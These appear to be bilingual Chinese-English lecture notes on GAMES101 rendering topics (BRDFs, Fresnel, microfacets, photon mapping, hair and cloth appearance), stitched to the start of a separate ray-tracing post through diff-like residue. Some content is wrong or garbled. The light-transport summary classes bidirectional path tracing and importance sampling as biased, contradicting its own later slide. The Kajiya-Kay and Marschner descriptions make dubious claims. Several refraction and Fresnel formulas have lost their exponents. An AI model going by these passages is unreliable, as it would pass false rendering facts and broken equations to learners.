    ​BRDF 是双向反射分布函数(Bidirectional Reflectance Distribution Function)的缩写。它是描述表面材质如何反射入射光的函数。BRDF 定义了给定入射方向和出射方向下,单位入射光能量在各个出射方向上的分布。简单来说,BRDF 描述了光线与表面相互作用时光的反射特性。

    What is this material?

    png

    Diffuse / Lambertian Material (BRDF)

    ​漫反射/朗伯材质 (BRDF)

    png


    Light is equally reflected in each output direction

    ​光线在每个输出方向上均等反射

    png

    Suppose the incident lighting is uniform:

    ​假设入射光是均匀的:

    $$\begin{aligned}
    L_o(\omega_o)& =\int_{H^2}f_rL_i(\omega_i)\cos\theta_i\mathrm{d}\omega_i \
    &=f_rL_i\int_{H^2}(\omega_i)\cos\theta_i\mathrm{d}\omega_i \
    &=\pi f_rL_i
    \end{aligned}$$

    $f_r=\frac{\rho}{\pi}$——albedo 反照率 (color)


    What is this material?

    png


    Glossy material (BRDF)

    ​光泽材质(BRDF)

    png


    What is this material?

    png


    Ideal reflective / refractive material (BSDF)*

    ​理想的反射/折射材料 (BSDF*)

    png


    Perfect Specular Reflection

    ​完美的镜面反射(只有反射没有折射)

    png

    png

    Top-down view (looking down on surface)
    自上而下的视图(俯视表面)

    png

    $$\omega_o+\omega_i=2\cos\theta\mathrm{~\vec{n}}=2(\omega_i\cdot\vec{\mathrm{n}})\vec{\mathrm{n}}$$

    $$\omega_o=-\omega_i+2(\omega_i\cdot\vec{\mathrm{n}})\vec{\mathrm{n}}$$


    Perfect Specular Reflection BRDF

    ​完美镜面反射 BRDF

    png


    Specular Refraction

    ​镜面折射

    In addition to reflecting off surface, light may be transmitted through surface.

    ​除了从表面反射外,光还可以穿过表面。

    Light refracts when it enters a new medium.

    ​光进入新介质时会发生折射。

    png


    Snell’ s Law

    ​斯涅尔定律

    Transmitted angle depends on

    ​透射角取决于

    index of refraction (IOR) for incident ray

    ​入射光线的折射率 (IOR)

    index of refraction (IOR) for exiting ray

    ​出射光线的折射率 (IOR)

    png

    $$\eta_i\sin\theta_i=\eta_t\sin\theta_t$$


    Law of Refraction

    ​折射定律

    png

    $$\begin{aligned}
    \eta_{i}\sin\theta_{i}& =\eta_t\sin\theta_t \
    \cos\theta_{t}& =\sqrt{1-\sin^2\theta_t} \
    &=\sqrt{1-\left(\frac{\eta_i}{\eta_t}\right)2\sin2\theta_i} \
    &=\sqrt{1-\left(\frac{\eta_i}{\eta_t}\right)2(1-\cos2\theta_i)}
    \end{aligned}$$

    Total internal reflection:

    ​全内反射

    When light is moving from a more optically dense medium to a less optically dense medium:

    ​当光从光密度较大的介质移动到光密度较小的介质时:

    $$1-\left(\frac{\eta_i}{\eta_t}\right)2(1-\cos2\theta_i)<0$$

    求得

    $$\frac{\eta_i}{\eta_t}>1$$

    Light incident on boundary from large enough angle will not exit medium.

    ​从足够大的角度入射到边界的光将不会离开介质。


    Snell’ 's Window / Circle

    png


    Fresnel Reflection / Term

    ​菲涅尔项

    Reflectance depends on incident angle (and polarization of light)

    ​反射率取决于入射角(和光的偏振)

    png

    This example: reflectance increases with grazing angle

    ​本例:反射率随观察角增加(变亮了)

    ​Fresnel Term(菲涅尔项)描述了光线与介质界面之间的反射和透射的比例。菲涅尔项是一个关于入射角度和折射率之间关系的函数,通常用来计算光线在介质表面的反射和透射的强度。

    ​在计算菲涅尔项时,通常使用菲涅尔方程来描述入射光线在介质表面的反射和透射情况。菲涅尔方程包括两个方面:垂直极化和平行极化。垂直极化表示光的电场矢量垂直于入射平面,而平行极化表示电场矢量在入射平面内。

    ​菲涅尔项的计算取决于入射角度、折射率以及光线的极化状态。在计算机图形学和光学模拟中,菲涅尔项通常被用于模拟材质的反射特性,以便更准确地模拟真实世界中的光线行为。


    Fresnel Term (Dielectric, $\eta=1.5$)

    ​菲涅尔项(介电体,$\eta=1.5$)

    png

    • S 极化(也称为垂直极化):在S极化状态下,入射光的电场矢量与入射平面垂直。当光线以 S 极化状态入射到介质表面时,其部分能量会被反射,而部分会被折射。S 极化通常与垂直于入射平面的反射和透射相关联。

    • P 极化(也称为平行极化):在P极化状态下,入射光的电场矢量位于入射平面内。与 S 极化类似,当光线以 P 极化状态入射到介质表面时,也会发生一部分反射和一部分折射。P极化通常与入射平面内的反射和透射相关联。

    • “unpolarized”(非偏振)光是指入射光中电场矢量的方向没有特定的取向,而是随机分布的。这意味着它包含了各种极化状态的光,无法用 S 极化或 P 极化来描述。非偏振光通常是自然光或由光源发出的常见光线,其电场矢量在所有可能的方向上均匀分布。在介质表面反射时,非偏振光的极化状态可能会因反射而发生改变,产生 S 极化和 P 极化的组合。

    ​与表面法线夹角越大,反射率越高。


    Fresnel Term (Conductor)

    ​菲涅尔项(导体)

    png


    Fresnel Term — Formulae

    ​菲涅尔项 — 公式

    Accurate: need to consider polarization

    ​准确:需要考虑极化

    $$R_s=\left|\frac{n_1\cos\theta_\mathrm{i}-n_2\cos\theta_\mathrm{t}}{n_1\cos\theta_\mathrm{i}+n_2\cos\theta_\mathrm{t}}\right|2=\left|\frac{n_1\cos\theta_\mathrm{i}-n_2\sqrt{1-\left(\frac{n_1}{n_2}\sin\theta_\mathrm{i}\right)2}}{n_1\cos\theta_\mathrm{i}+n_2\sqrt{1-\left(\frac{n_1}{n_2}\sin\theta_\mathrm{i}\right)^2}}\right|$$

    $$R_\mathrm{p}=\left|\frac{n_1\cos\theta_\mathrm{t}-n_2\cos\theta_\mathrm{i}}{n_1\cos\theta_\mathrm{t}+n_2\cos\theta_\mathrm{i}}\right|2=\left|\frac{n_1\sqrt{1-\left(\frac{n_1}{n_2}\sin\theta_\mathrm{i}\right)2}-n_2\cos\theta_\mathrm{i}}{n_1\sqrt{1-\left(\frac{n_1}{n_2}\sin\theta_\mathrm{i}\right)2}+n_2\cos\theta_\mathrm{i}}\right|2$$

    $$R_\mathrm{eff}=\frac12\left(R_\mathrm{s}+R_\mathrm{p}\right)$$

    Approximate: Schlick’ s approximation

    ​近似:Schlick 近似

    $$\begin{aligned}
    R(\theta)& =R_0+(1-R_0)(1-\cos\theta)^5 \
    R_{0}& =\left(\frac{n_1-n_2}{n_1+n_2}\right)^2
    \end{aligned}$$

    Microfacet Material

    ​微面片材质

    png

    ​从太空中看地球,看不出山脉的粗糙,反而是一片光滑的感觉。


    Microfacet Theory

    ​微面理论

    png

    Rough surface

    ​粗糙表面

    • Macroscale: flat & rough

      宏观尺度:平坦且粗糙

    • Microscale: bumpy & specular

      微观尺度:凹凸不平且镜面反射

    Individual elements of surface act like mirrors

    表面的各个元素就像镜子一样

    • Known as Microfacets

      称为微面

    • Each microfacet has its own normal

      每个微面都有自己的法线


    Key: the distribution of microfacets’ normals

    ​关键:微面元法线的分布

    png

    • Concentrated <==> glossy

      集中 <==> 光泽

    png

    • Spread <==> diffuse

      分散 <==> 漫射


    Microfacet BRDF

    • What kind of microfacets reflect $w_i$ to $w_o$? (hint: microfacets are mirrors)

      什么样的微表面能将 $w_i$ 反射到 $w_o$?(提示:微表面是镜子)

    png

    $f(\mathbf{i},\mathbf{o})=\frac{\mathbf{F}(\mathbf{i},\mathbf{h})\mathbf{G}(\mathbf{i},\mathbf{o},\mathbf{h})\mathbf{D}(\mathbf{h})}{4(\mathbf{n,i})(\mathbf{n,o})}$

    • $\mathbf{F}(\mathbf{i},\mathbf{h})$​:Fresnel term 菲涅尔项
    • $\mathbf{G(i,o,h)}$:shadowing-masking term 遮蔽掩蔽项(微表面反射时被另一个微表面所阻挡)
    • $\mathbf{D(h)}$​:distribution of normals(法线的分布)

    png


    Isotropic / Anisotropic Materials (BRDFs)

    ​各向同性/各向异性材料 (BRDF)

    png

    ​对不同方向光反射率不一样,称为各向异性材料(一般现实生活中,这种材料都是人造的)

    • Key: directionality of underlying surface

      关键词:底层表面的方向性

    png


    Anisotropic BRDFs

    ​各向异性 BRDF

    Reflection depends on azimuthal angle $\Phi$

    ​反射取决于方位角 $\Phi$

    $$f_r(\theta_i,\phi_i;\theta_r,\phi_r)\neq f_r(\theta_i,\theta_r,\phi_r-\phi_i)$$

    Results from oriented microstructure of surface, e.g., brushed metal

    ​来自表面定向微结构的结果,例如拉丝金属

    png

    png

    png

    png

    ​这玩意摸一摸还能改变它的纹路。


    Properties of BRDFs

    ​BRDF 的性质

    • Non-negativity

      非负性

    $$f_r(\omega_i\to\omega_r)\ge 0$$

    • Linearity

      线性叠加

    $$L_r(\mathrm{p},\omega_r)=\int_{H^2}f_r(\mathrm{p},\omega_i\to\omega_r)L_i(\mathrm{p},\omega_i)\cos\theta_i\mathrm{d}\omega_i$$

    png

    • Reciprocity principle

      可逆性

    $$f_r(\omega_r\to\omega_i)=f_r(\omega_i\to\omega_r)$$

    png

    • Energy conservation

      能量守恒

    $$\forall\omega_r\int_{H^2}f_r(\omega_i\to\omega_r)\cos\theta_i\mathrm{d}\omega_i\leq1$$

    ​一部分能量被吸收,$\le 1$

    • Isotropic vs. anisotropic
      • If isotropic, $f_r(\theta_i,\phi_i;\theta_r,\phi_r)=f_r(\theta_i,\theta_r,\phi_r-\phi_i)$
      • Then, from reciprocity, $f_r(\theta_i,\theta_r,\phi_r-\phi_i)=f_r(\theta_r,\theta_i,\phi_i-\phi_r)=f_r(\theta_i,\theta_r,|\phi_r-\phi_i|)$

    png

    Measuring BRDFs

    Measuring BRDFs: Motivation

    ​测量 BRDF:动机

    Avoid need to develop / derive models

    • Automatically includes all of the scattering effects present

    Can accurately render with real-world materials

    • Useful for product design, special effects, …

    Theory vs. practice:

    png


    Image-Based BRDF Measurement

    ​基于图像的 BRDF 测量

    png

    ​光线照着物体,相机绕物体一周。


    Measuring BRDFs: goniore flectometer

    ​测量 BRDF:测角反射计

    png


    Measuring BRDFs

    General approach:

    ​一般的做法:

    1
    2
    3
    4
    5
    foreach outgoing direction wo 对于每个出射方向 wo
    move light to illuminate surface with a thin beam from wo 移动光线,使来自 wo 的细光束照亮表面
    for each incoming direction wi 对于每个入射方向 wi
    move sensor to be at direction wi from surface 移动传感器,使其位于距表面 wi 方向
    measure incident radiance 测量入射辐射度

    Improving efficiency:

    ​提高效率:

    • Isotropic surfaces reduce dimensionality from 4D to 3D

      各向同性表面将维度从 4D 降低到 3D

    • Reciprocity reduces # of measurements by half

      互易性将测量次数减少一半

    • Clever optical systems…

      智能光学系统……


    Challenges in Measuring BRDFs

    • Accurate measurements at grazing angles

      以掠射角进行精确测量

    • Important due to Fresnel effects

      由于菲涅尔效应而显得重要

    • Measuring with dense enough sampling to capture high frequency specularities

      使用足够密集的采样进行测量以捕捉高频镜面反射

    • Retro-reflection

      回射

    • Spatially-varying reflectance, …

      空间变化的反射率,…


    Representing Measured BRDFs

    ​表示测量的 BRDF

    Desirable qualities

    ​理想品质

    • Compact representation

      紧凑表示

    • Accurate representation of measured data

      测量数据的准确表示

    • Efficient evaluation for arbitrary pairs of directions

      对任意方向对的有效评估

    • Good distributions available for importance sampling

      可用于重要性抽样的良好分布


    Tabular Representation

    ​表格表示

    Store regularly-spaced samples in 将间隔均匀的样本存储在 $(\theta_i,\theta_o,|\phi_i-\phi_o|)$

    • Better: reparameterize angles to better match specularities

      更好:重新参数化角度以更好地匹配镜面反射

    Generally need to resample measured values to table

    ​通常需要将测量值重新采样到表中

    Very high storage requirements

    ​存储要求非常高

    png

    Lecture 18 Advanced Topics in Rendering

    Advanced Light Transport

    1. Unbiased light transport methods(无偏光线传输方法)
      • 这些方法旨在以最准确的方式模拟真实世界中光的行为,而不引入系统性的偏差。
      • 无偏方法通常通过追踪光线的路径并对其进行积分来实现。典型的无偏方法包括路径追踪(Path Tracing)、光子映射(Photon Mapping)和Metropolis光线追踪(Metropolis Light Transport)等。
      • 优点:可以获得高质量、逼真的图像,特别是对于复杂的光照和材质场景。
      • 缺点:由于需要追踪大量的光线路径并进行复杂的积分计算,无偏方法通常具有较高的计算成本。
    2. Biased light transport methods(有偏光线传输方法)
      • 这些方法通过引入一定的偏差或近似,以减少计算成本并加快渲染速度。
      • 有偏方法的设计目标是在保持图像质量的同时降低计算复杂度。
      • 典型的有偏方法包括辐射传输(Radiosity)、双向路径追踪(Bidirectional Path Tracing)、重要性采样(Importance Sampling)等。
      • 优点:通常比无偏方法更快速,尤其适用于实时渲染和交互式应用。
      • 缺点:可能会引入一定程度的图像噪声或伪影,因为近似方法可能无法完全准确地模拟真实世界中的光传输。

    ​ 总的来说,无偏光线传输方法追求最高的图像质量和真实性,但计算成本较高;而有偏光线传输方法则更注重在合理的计算复杂度下获得可接受的图像质量,适用于实时或大规模渲染场景。在实际应用中,通常会根据具体需求和性能要求选择适当的光线传输方法。

    • Unbiased light transport methods

      无偏光传输方法

      • Bidirectional path tracing (BDPT)

        双向路径追踪 (BDPT)

      • Metropolis light transport (MLT)

        Metropolis 光传输 (MLT)

    • Biased light transport methods

      偏光传输方法

      • Photon mapping

        光子映射

      • Vertex connection and merging (VCM)

        顶点连接和合并 (VCM)

      • Instant radiosity (VPL / many light methods)

        即时辐射度 (VPL / 多种光方法)


    Biased vs. Unbiased Monte Carlo Estimators

    • An unbiased Monte Carlo technique does not have any systematic error

      无偏蒙特卡罗技术没有任何系统误差

      • The expected value of an unbiased estimator will always be the correct value, no matter how many samples are used

        无论使用多少样本,无偏估计量的预期值始终是正确的值

    • Otherwise, biased

      否则,有偏差

      • One special case, the expected value converges to the correct value as infinite #samples are used — consistent

        一种特殊情况,随着使用无限数量的样本,预期值会收敛到正确值

    • We’ ll look again at this page after introducing Photon Mapping

      在介绍光子映射后,我们将再次查看此页面


    Bidirectional Path Tracing (BDPT)

    • Recall: a path connects the camera and the light

      回想一下:一条路径连接着相机和灯光

    • BDPT

      • Traces sub-paths from both the camera and the light

        追踪来自相机和灯光的子路径

      • Connects the end points from both sub-paths

        连接两个子路径的端点

    png

    ​BDPT 的基本思想是同时追踪从光源到摄像机的路径和从摄像机到场景中物体的路径,然后在这些路径上进行连接,以计算从光源到摄像机的光照传输。这种双向追踪方式为模拟复杂光照效果提供了更多的可能性。

    1. 从摄像机追踪路径
      • 从摄像机发射光线,追踪它们在场景中的路径。这种方法类似于传统路径追踪。
    2. 从光源追踪路径
      • 同时,从光源开始发射光线,追踪它们在场景中的传播。这种方法类似于光子映射等技术。
    3. 路径连接
      • 关键步骤是在摄像机路径和光源路径之间进行连接,形成一系列完整的路径。这些连接点的交汇位置和路径长短可以用来计算光照传输。

    png

    ​这是一个光路复杂的场景,主要光照都来自灯打到天花板后反射出来的光。

    • Suitable if the light transport is complex on the light’ s side

      适用于光传输在光端复杂的情况下

    • Difficult to implement & quite slow

      难以实现且速度较慢


    Metropolis Light Transport (MLT)

    png

    ​MLT 基于马尔可夫链蒙特卡洛算法 (Markov Chain Monte Carlo, MCMC)。它通过在渲染过程中构建一系列状态(或称为路径)并使用概率转移来搜索光线路径空间,以寻找高质量的渲染解决方案。

    1. 状态空间构建
      • MLT 从初始状态(或路径)开始,通过一系列随机变化逐步构建状态空间。这些状态描述了光线在场景中的传播路径,包括从光源到摄像机的直接和间接光照。
    2. 概率转移
      • MLT 使用概率转移算法来在状态空间中搜索,以决定接受或拒绝新状态。这个过程涉及到一系列基于状态之间差异的概率计算,以及利用接受率来平衡探索和收敛性能。
    3. 样本累积
      • MLT 通过对多个状态进行采样并根据它们的贡献权重来累积样本,以生成最终的渲染图像。这样的采样过程能够有效地降低图像中的噪声,并提高渲染的质量。
    • A Markov Chain Monte Carlo (MCMC) application

      马尔可夫链蒙特卡罗 (MCMC) 应用

      • Jumping from the current sample to the next with some PDF

        使用一些 PDF 从当前样本跳转到下一个样本

    • Very good at locally exploring difficult light paths

      非常擅长局部探索困难的光路

    • Key idea

      关键思想

      • Locally perturb an existing path to get a new path

        局部扰动现有路径以获得新路径


    png

    优点:

    • Works great with difficult light paths

      适用于困难的光路

    • Also unbiased

      也无偏差


    png

    缺点:

    • Difficult to estimate the convergence rate

      难以估计收敛速度

    • Does not guarantee equal convergence rate per pixel

      不能保证每个像素的收敛速度相等

    • So, usually produces “dirty” results

      因此,通常会产生“脏”结果

    • Therefore, usually not used to render animations

      因此,通常不用于渲染动画


    Photon Mapping

    ​光子映射

    png

    • A biased approach & A two-stage method

      有误差的方法和两阶段方法

    • Very good at handling Specular-Diffuse-Specular (SDS) paths and generating caustics

      非常擅长处理镜面反射-漫反射-镜面反射 (SDS) 路径和生成焦散


    Photon Mapping — Approach (variations apply)

    ​光子映射——方法(适用变化)

    ​Photon Mapping 主要分为两个阶段:光子发射和光子映射。

    1. 光子发射
      • 在这个阶段,光子从光源发射,并在场景中传播。这些光子以一定的概率与场景中的表面相交,并根据相交点的性质,如表面颜色、材质等,进行反射、折射或吸收。
    2. 光子映射
      • 在这个阶段,光子被映射到场景的光线路径上,并存储在特定的数据结构中,如光子图(photon map)。这个数据结构可以是基于光子碰撞点的空间分布,也可以是基于光子的能量和颜色等属性。
    3. 渲染
      • 在渲染阶段,相机射线从观察点出发,与场景中的表面相交。当相机射线与场景中的表面相交时,就可以使用光子图来估计光线的颜色和强度,从而计算出最终的图像颜色。

    png

    • Stage 1 — photon tracing

      第 1 阶段 — 光子追踪

      • Emitting photons from the light source, bouncing them around, then recording photons on diffuse surfaces

        从光源发射光子,使其四处反射,然后在漫反射表面上记录光子

    • Stage 2 — photon collection (final gathering)

      第 2 阶段 — 光子收集(最终聚集)

      • Shoot sub-paths from the camera, bouncing them around, until they hit diffuse surfaces

        从相机中发射子路径,让它们四处弹跳,直到它们击中漫反射表面


    Photon Mapping

    png

    • Calculation — local density estimation

      计算 — 局部密度估计

      • Idea: areas with more photons should be brighter

        想法:光子较多的区域应该更亮

      • For each shading point, find the nearest N photons. Take the surface area they over

        对于每个着色点,找到最近的 N 个光子。取它们覆盖的表面积


    png

    • Why biased?

      为什么有偏差?

    • Local Density estimation $\text dN / \text dA \ne \Delta N / \Delta A$

      局部密度估计 $\text dN / \text dA \ne \Delta N / \Delta A$

    • But in the sense of limit

      但在极限意义上

      • More photons emitted ->

        发射更多光子 ->

      • the same $N$ photons covers a smaller $\Delta A$ ->

        相同的 $N$ 个光子覆盖较小的 $\Delta A$ ->

      • $\Delta A$ is closer to $\text dA$

        $\Delta A$ 更接近 $\text dA$

    • So, biased but consistent!

      因此,有偏差但一致!

    • An easier understanding bias in rendering

      更容易理解渲染中的偏差

      • Biased == blurry

        偏差 == 模糊

      • Consistent == not blurry with infinite #samples

        一致 == 无限 #samples 不模糊

    • Why not do a “const range” search for density estimation?

      为什么不进行“常量范围”搜索以进行密度估计?


    Vertex Connection and Merging

    ​顶点连接与合并

    png

    • A combination of BDPT and Photon Mapping

      BDPT 和光子映射的结合

    • Key idea

      关键思想

      • Let’ s not waste the sub-paths in BDPT if their end points cannot be connected but can be merged

        如果 BDPT 中的子路径的端点无法连接但可以合并,那么就不要浪费它们

      • Use photon mapping to handle the merging of nearby “photons”

        使用光子映射来处理附近“光子”的合并


    Instant Radiosity (IR)

    ​即时辐射 (IR)

    png

    • Sometimes also called many-light approaches

      有时也称为多光方法

    • Key idea

      核心思想

      • Lit surfaces can be treated as light sources

        光照表面可视为光源

    • Approach

      方法

      • Shoot light sub-paths and assume the end point of each sub-path is a Virtual Point Light (VPL)

        拍摄光子路径并假设每个子路径的终点是虚拟点光源 (VPL)

      • Render the scene as usual using these VPLs

        使用这些 VPL 照常渲染场景

    png

    ​右图中,由于除以了一个极小的浮点数,导致边缘极亮。

    • Pros: fast and usually gives good results on diffuse scenes

      优点:速度快,通常在漫反射场景中效果良好

    • Cons:

      缺点

      • Spikes will emerge when VPLs are close to shading points

        当 VPL 靠近着色点时会出现尖峰

      • Cannot handle glossy materials

        无法处理光泽材质

    Advanced Appearance Modeling

    ​非表面模型是描述物体内部结构或几何形状的模型,不仅包括物体的外部表面,还包括内部的结构或体积。

    • Non-surface models

      非表面模型

      • Participating media

        参与介质

      • Hair / fur / fiber (BCSDF)

        头发/毛皮/纤维 (BCSDF)

      • Granular material

        颗粒材料

    ​表面模型是描述物体外部表面的模型,通常由一系列的表面片段或曲面组成。

    • Surface models

      表面模型

      • Translucent material (BSSRDF)

        半透明材料 (BSSRDF)

      • Cloth

        布料

      • Detailed material (non-statistical BRDF)

        详细材料 (非统计 BRDF)

    • Procedural appearance

      程序外观

    Non-Surface Models

    ​非表面模型


    Participating Media

    ​粒子媒介

    png

    ​非表面模型范例:Fog 和 Cloud。

    png

    • At any point as light travels through a participating medium, it can be (partially) absorbed and scattered.

      光在穿过参与介质的任何时刻都会被(部分)吸收和散射。

    png

    • Use Phase Function to describe the angular distribution of light scattering at any point $x$ within participating media.

      使用相位函数描述参与介质中任意点 $x$ 的光散射的角度分布。


    Participating Media: Rendering

    png

    • Randomly choose a direction to bounce

      随机选择一个方向进行反弹

    • Randomly choose a distance to go straight

      随机选择一个距离进行直线运动

    • At each ‘shading point’, connect to the light

      在每个“阴影点”处,连接到灯光


    Participating Media: Application

    png


    Hair Appearance

    ​毛发材质

    png


    Kajiya-Kay Model

    ​Kajiya-Kay 模型是一种经典的计算机图形学模型,用于模拟光照在物体表面的反射和折射过程。这个模型由Jim Kajiya和Tim Kay在1989年提出,是计算机图形学中重要的全局照明模型之一。

    Kajiya-Kay 模型的基本原理:

    ​Kajiya-Kay 模型基于渲染方程(Rendering Equation),它描述了光照在场景中的传播和交互过程。这个方程表达了在某一点的表面上观察到的辐射强度与该点表面上各个方向上的入射光线、表面材质的反射性质和环境光之间的关系。

    ​Kajiya-Kay 模型基于渲染方程,通过对方程中的光照传播和反射过程进行近似和简化,提供了一种实用的方法来计算逼真的图像。

    Kajiya-Kay 模型的主要特点:

    1. 表面属性表示:模型考虑了表面的漫反射、镜面反射和折射等属性,能够模拟各种类型表面的光照行为。
    2. 局部光照模型:Kajiya-Kay 模型采用了局部光照模型,即在计算每个表面点的照明时只考虑场景中的局部光线而不考虑全局光照效应。
    3. 环境光影响:除了考虑直接光照之外,模型还考虑了环境光对物体表面的影响,使得渲染结果更加逼真。

    png

    png

    ​使用 Kajiya-Kay Model 渲染头发的效果图。


    Marschner Model

    ​Marschner 模型是一种用于模拟人类头发或其他细长纤维的光照行为的计算机图形学模型。它由 Steve Marschner 等人在 2003 年提出,是一种基于物理的模型,旨在更准确地描述头发等细长纤维的外观。

    Marschner 模型的基本原理:

    ​Marschner 模型基于头发纤维的微观结构和光的物理性质,考虑了头发内部的散射、吸收和折射等光学效应,以及表面的漫反射、镜面反射和透射等效应。

    Marschner 模型的主要特点:

    1. 多层次模型:Marschner 模型将头发纤维划分为多个层次,包括表面层、皮层和髓质层,每一层都具有不同的光学特性和光学响应。
    2. 光学效应建模:模型考虑了头发内部的多次散射和折射过程,以及表面的漫反射、镜面反射和透射等效应,使得渲染结果更加逼真。
    3. 色彩衍射:Marschner 模型能够模拟头发纤维在光照下产生的色彩衍射效应,使得头发的颜色在不同的光照条件下呈现出细微的变化。
    4. 动态效果:模型还考虑了头发纤维的运动和形变对光照行为的影响,能够生成动态的头发效果。

    png

    png

    • Glass-like cylinder

      玻璃状圆柱体

    png

    • 3 types of light interactions: R, TT, TRT

      3 种光相互作用:R、TT、TRT

      (R: reflection, T: transmission)

    (R:反射,T:透射)

    png


    Hair Appearance Model: Application

    png


    Fur Appearance — As Human Hair

    ​毛皮外观——作为人类头发

    • Cannot represent diffusive and saturated appearance

      无法呈现弥散和饱和的外观(用人类头发模型来描述动物毛发效果并不真实)

    png


    Human Hair vs Animal Fur

    png

    ​人类毛发结构与动物毛发结构不太一样。

    • Common for hair/fur fibers

      常见于毛发/毛皮纤维

      • Cuticle

        角质层

        • Covered with scales

          覆盖有鳞片

      • Medulla

        髓质

        • Complex structure

          结构复杂

        • Scatters light

          散射光线

      • Cortex

        皮质

        • Contains pigments

          含有色素

        • Absorbs light

          吸收光线


    Importance of Medulla

    ​髓质层的重要性(让毛发更具光泽)

    png

    png


    Double Cylinder Model

    ​双重圆柱体模型

    png


    Double Cylinder Model — Lobes

    png

    png

    png

    ​这张图渲染一帧要 36.9min。

    png


    Granular Material

    ​颗粒材质

    • What is granular material?

    png

    png

    Can we avoid explicit modeling of all granules?

    ​我们能否避免对所有粒子进行显式建模?

    • Yes with procedural definition.

      是的,通过程序定义。

    png

    Surface Models

    png

    ​接下来处理这种 Translucent Material 半透明的材质。


    Subsurface Scattering

    ​次表面散射

    png

    • Visual characteristics of many surfaces caused by light exiting at different points than it enters

      由于光线从不同点射出和射入,导致许多表面的视觉特征

      • Violates a fundamental assumption of the BRDF

        违反了 BRDF 的基本假设

    png


    Scattering Functions

    ​散射函数

    • BSSRDF: generalization of BRDF; exitant radiance at one point due to incident differential irradiance at another point:

      BSSRDF:BRDF 的推广;某一点的出射辐射度是由于另一点的入射差分辐照度引起的:

    $$S(x_i,\omega_i,x_o,\omega_o)$$

    • Generalization of rendering equation: integrating over all points on the surface and all directions (!)

      渲染方程的推广:对表面上所有点和所有方向进行积分(!)

    $$L(x_o,\omega_o)=\int_A\int_{H^2}S(x_i,\omega_i,x_o,\omega_o)L_i(x_i,\omega_i)\cos\theta_i\mathrm d\omega_i\mathrm dA$$

    png


    Dipole Approximation [Jensen et al. 2001]

    • Approximate light diffusion by introducing two point sources.

      通过引入两个点源来近似光扩散。

    png

    ​BRDF 与 BSSRDF 效果对比:

    png

    png

    png

    png


    Cloth

    png

    A collection of twisted fibers!

    ​扭曲纤维的集合!

    Two levels of twist

    ​两层扭曲

    • Woven or knitted

      机织或针织

    png


    Cloth: Render as Surface

    png

    • Given the weaving pattern, calculate the overall behavior

      给定编织模式,计算整体行为

    • Render using a BRDF

      使用 BRDF 进行渲染

    png

    Render as Surface — Limitation

    png

    ​这个模型对尼龙好使,对天鹅绒不好使。


    Cloth: Render as Participating Media

    ​将布料作为参与媒介

    png

    • Properties of individual fibers & their distribution -> scattering parameters

      单个纤维的属性及其分布 -> 散射参数

    • Render as a participating medium

      作为参与介质进行渲染


    Cloth: Render as Actual Fibers

    png

    • Render every fiber explicitly!

      每根纤维地渲染!啊!计算量爆炸!


    Cloth: Demo & Application

    png


    Detailed Appearance: Motivation

    ​详细外观:动机

    png

    • Not looking realistic, why?

      看上去并不真实,为什么?表面太完美了,没有划痕,反而不够真实。


    Real world is more complicated

    ​现实世界更加复杂

    png

    png


    Recap: Microfacet BRDF

    ​回顾:微面片 BRDF

    png

    Surface = Specular microfacets + Statistical normals

    表面 = 镜面微表面 + 统计法线

    $$f(\mathbf{i},\mathbf{o})=\frac{\mathbf{F}(\mathbf{i},\mathbf{h})\mathbf{G}(\mathbf{i},\mathbf{o},\mathbf{h})\mathbf{D}(\mathbf{h})}{4(\mathbf{n},\mathbf{i})(\mathbf{n},\mathbf{o})}$$

    • $\mathbf{D}(\mathbf{h})$:

      NDF: Normal Distribution Function

      法线分布函数


    Statistical NDF vs. Actual NDF

    png

    ​将法线变得有锯齿。


    Define details

    png

    ​法线坑坑洼洼的。渲染?太难了!


    Difficult path sampling problem

    ​困难路径采样问题

    png

    ​好多射线都 miss 了,浪费了运算资源。


    Solution: BRDF over a pixel

    ​解决方案:像素上的 BRDF

    png

    Detailed / Glinty Material

    ​细致/闪亮材质

    png


    Recent Trend: Wave Optics

    ​近期趋势:波动光学

    ​光是有波粒二象性的,当光透过极小的空隙后,光就不可视为直线传播,就会产生其它颜色的小光斑。

    png

    png

    Procedural Appearance

    png

    • Can we define details without textures?

      我们可以在不使用纹理的情况下定义细节吗?

      • Yes! Compute a noise function on the fly.

        是的!动态计算噪声函数。(纹理是用函数计算出来的)

      • 3D noise ->internal structure if cut or broken

        3D 噪音 -> 内部结构如有切割或破损(依然可以显示出纹理)

      • Thresholding (noise -> binary noise)

        阈值(噪声 -> 二元噪声)

    ]]>
    @@ -2195,7 +2195,7 @@ /posts/GAMES101-%E7%8E%B0%E4%BB%A3%E8%AE%A1%E7%AE%97%E6%9C%BA%E5%9B%BE%E5%BD%A2%E5%AD%A6%E5%85%A5%E9%97%A8-%E9%97%AB%E4%BB%A4%E7%90%AA%EF%BC%885%EF%BC%89/ - 资源

    课程

    Lecture 13: Ray Tracing 1 (Whitted-Style Ray Tracing)

    Why Ray Tracing?

    png

    Soft shadows

    ​软阴影

    Glossy reflection

    ​光泽反射

    Indirect illumination

    ​间接照明

    • Rasterization couldn’ t handle global effects well

    光栅化无法很好地处理全局效果

    • (Soft) shadows

    (软)阴影

    • And especially when the light bounces more than once

      尤其是当光线反弹不止一次时


    png

    Rasterization is fast, but quality is relatively low

    ​光栅化速度快,但质量相对较低

    ​早期的游戏看上去画质不好,因为这个游戏的地图太大了,为了保证性能只得牺牲画质。


    png

    ​不需要实时渲染的任务下,光线追踪可以渲染出很好的效果。

    • Ray tracing is accurate, but is very slow

      光线追踪很精确,但速度很慢

      • Rasterization: real-time, ray tracing: offline

        光栅化:实时,光线追踪:离线

      • ~10K CPU core hours to render one frame in production

        在生产中渲染一帧图像需要 ~10K CPU 核心小时

    Basic Ray-Tracing Algorithm

    Light Rays

    ​光线

    Three ideas about light rays

    关于光线的三种观点

    1. Light travels in straight lines (though this is wrong)

      光是直线传播的(尽管这是错误的)

    2. Light rays do not “collide” with each other if they cross (though this is still wrong)

      光线交叉时不会相互 “碰撞”(尽管这仍然是错误的)

    3. Light rays travel from the light sources to the eye (but the physics is invariant under path reversal-reciprocity).

      光线从光源到眼睛传播(但物理规律在路径反向-互易性下保持不变)

    “And if you gaze long into an abyss, the abyss also gazes into you.” — Friedrich Wilhelm Nietzsche (translated)

    ​当你在凝视深渊时,深渊也在凝视你。


    Emission Theory of Vision

    ​视觉发射理论。认为人之所以能够看到东西,是因为人眼发出的射线投射到了相应的物体上。虽然这是错误的,但我们可以从中得到启发。

    png

    “For every complex problem there is ananswer that is clear, simple, and wrong.”——H.L.Mencken

    ​每一个复杂的问题都有一个清晰、简单和错误的答案。


    Ray Casting

